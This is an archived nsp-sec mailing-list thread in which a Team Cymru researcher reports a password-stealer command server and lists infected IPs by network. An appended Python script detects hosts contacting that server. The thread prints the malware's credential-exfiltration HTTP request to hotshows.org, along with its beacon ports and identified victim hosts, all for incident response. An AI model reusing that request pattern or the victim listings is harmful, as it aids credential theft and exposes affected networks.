[nsp-sec] 130K+ Infected Ips on ~3600 ASNs

Stephen Gill gillsr at cymru.com
Thu Oct 1 17:04:05 EDT 2009


Hi Beth,

My apologies.  After filtering out DNS for your AS this one is the guy
causing the ruckus:

http://www.cymru.com/nsp-sec/Owned/stealer/as2572.txt

2572    | 204.184.112.80   | 204.184.0.0/17      | US | arin     | 1994-11-04 | U 2009/10/01 14:40:29.056683 | MORENET - Missouri Research and Education Network (MOREnet)

Connections look like this:

U 2009/10/01 14:14:47.015091 204.184.112.80:23982 -> 76.73.37.250:7007

Plenty more timestamps available if needed.

-- steve


On 10/1/09 11:40 AM, "Young, Beth A." <youngba at more.net> wrote:

> ----------- nsp-security Confidential --------
> 
> Partial ACK for 2572.
> 
> Of the 4 IP addresses listed, 3 are DNS servers.  The other is a NAT address
> that probably has a DNS server behind it.
> 
> Beth
> 
> 
> Beth Young, CISSP
> MOREnet Security
> 1-800-509-6673
> http://www.more.net/security
> 
> 
> 
> 
>> -----Original Message-----
>> From: nsp-security-bounces at puck.nether.net [mailto:nsp-security-
>> bounces at puck.nether.net] On Behalf Of Stephen Gill
>> Sent: Thursday, October 01, 2009 12:48 PM
>> To: NSP-SEC List
>> Subject: [nsp-sec] 130K+ Infected Ips on ~3600 ASNs
>> 
>> ----------- nsp-security Confidential --------
>> 
>> Hi Team,
>> 
>> This password stealer head end IP appears to be quite busy:
>> 
>> 76.73.37.250
>> 
>> We're working w/ the ISP on takedown, however in the meantime here is a
>> list of 130K+ infected IPs seen talking to it primarily via TCP 80
>> (reporting stolen credentials) and UDP 7006 - UDP 7012.  I don't
>> anticipate an IP takedown to last forever because they can likely
>> re-route via DNS.
>> 
>>     ASN list:
>>     https://www.cymru.com/nsp-sec/Owned/stealer/asns.txt
>> 
>>     Infected IP list:
>>     https://www.cymru.com/nsp-sec/Owned/stealer/
>>     eg https://www.cymru.com/nsp-sec/Owned/stealer/as3.txt
>> 
>> Timestamps in UTC.
>> 
>> Some clarification on the formatting:
>> 
>> 3       | 18.26.4.9        | U 2009/10/01 03:44:49.511524 | MIT-GATEWAYS - Massachusetts Institute of Technology
>> 
>> The timestamp column will begin with a U or a T.  U is for UDP, T for
>> TCP.  When possible we've preferred to list out a T if we have seen any
>> TCP 80 traffic from the client IP in question.
>> 
>> It looks like the malware on the client may choose its source IP
>> address since we noticed some RFC 1918 traffic, so it is possible the
>> UDP data will not match in all cases.  I cannot guarantee that the UDP
>> traffic is not part of some type of actual software, but it sure looks
>> suspicious.  Here is a public URL for reference:
>> 
>>     http://www.prevx.com/filenames/1240768162315901-X1/CDSETUP.EXE.html
>> 
>> As there is UDP involved we cannot guarantee that there are 0 spoofed
>> IPs, but on the TCP side that is another matter.
>> 
>> HTTP credential stealing looks something like this:
>> 
>> GET
>> /pp2/?s=http%3a%2f%2fwww.STOLEN_HOSTNAME.com%2findex.php&u=%STOLEN_USER
>> NAME&
>> p=STOLEN_PASSWORD HTTP/1.1
>> User-Agent: Mozilla/4.0 (compatible).
>> Host: hotshows.org.
>> .
>> 
>> 
>> Cheers,
>> -- steve
>> 
>> --
>> Stephen Gill, Chief Scientist, Team Cymru
>> http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com
>> 
>> 
>> 
>> 
>> _______________________________________________
>> nsp-security mailing list
>> nsp-security at puck.nether.net
>> https://puck.nether.net/mailman/listinfo/nsp-security
>> 
>> Please do not Forward, CC, or BCC this E-mail outside of the
>> nsp-security community. Confidentiality is essential for effective
>> Internet security counter-measures.
>> _______________________________________________
> 

-- 
Stephen Gill, Chief Scientist, Team Cymru
http://www.cymru.com | +1 630 230 5423 | gillsr at cymru.com
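As an added example (not code from this thread or from Team Cymru), the following Python parses connection lines in the "U/T timestamp src:port -> dst:port" format quoted above, flags clients contacting the head end on the ports the original post lists, applies the same "T if any TCP 80 was seen, else U" preference per client, and recognises the /pp2/ reporting request line without returning the credential values. The head-end IP and ports come from the thread; the log lines and request lines are constructed samples.

```python
import re
from ipaddress import ip_address
from urllib.parse import urlsplit, parse_qs

HEAD_END = ip_address("76.73.37.250")   # stealer head end named in the thread
UDP_PORTS = range(7006, 7013)           # UDP 7006 - UDP 7012 inclusive

CONN_RE = re.compile(  # "U 2009/10/01 14:14:47.015091 204.184.112.80:23982 -> 76.73.37.250:7007"
    r"^(?P<proto>[UT]) (?P<ts>\S+ \S+) (?P<src>[\d.]+):\d+ -> (?P<dst>[\d.]+):(?P<dport>\d+)$")

def classify(line):
    """(proto, timestamp, client, note) for a contact with the head end, else None."""
    m = CONN_RE.match(line.strip())
    if not m or ip_address(m["dst"]) != HEAD_END:
        return None
    proto, dport = m["proto"], int(m["dport"])
    if proto == "U" and dport in UDP_PORTS:
        note = "udp-beacon"
    elif proto == "T" and dport == 80:
        note = "http-credential-report"
    else:
        return None
    if ip_address(m["src"]).is_private:
        note += ",rfc1918-source"   # client may have chosen its own source address
    return proto, m["ts"], m["src"], note

def summarize(lines):
    """Per client: 'T' if any TCP 80 contact was seen, else 'U', with the first timestamp."""
    seen = {}
    for proto, ts, src, _ in filter(None, map(classify, lines)):
        entry = seen.setdefault(src, [proto, ts])
        if proto == "T":
            entry[0] = "T"
    return {src: f"{p} {ts}" for src, (p, ts) in seen.items()}

def is_credential_report(request_line):
    """True for the GET /pp2/?s=...&u=...&p=... pattern; the values are never returned."""
    parts = request_line.split()
    if len(parts) != 3 or parts[0] != "GET":
        return False
    url = urlsplit(parts[1])
    return url.path == "/pp2/" and {"s", "u", "p"} <= set(parse_qs(url.query, keep_blank_values=True))

SAMPLE = [  # constructed sample lines in the thread's format, using documentation address ranges
    "U 2009/10/01 14:14:47.015091 203.0.113.7:23982 -> 76.73.37.250:7007",
    "T 2009/10/01 14:15:02.000001 203.0.113.7:51000 -> 76.73.37.250:80",
    "U 2009/10/01 14:16:11.500000 10.1.2.3:40000 -> 76.73.37.250:7012",
    "U 2009/10/01 14:17:00.000000 203.0.113.9:4000 -> 76.73.37.250:53",
    "T 2009/10/01 14:18:00.000000 198.51.100.4:1111 -> 192.0.2.1:80",
]
```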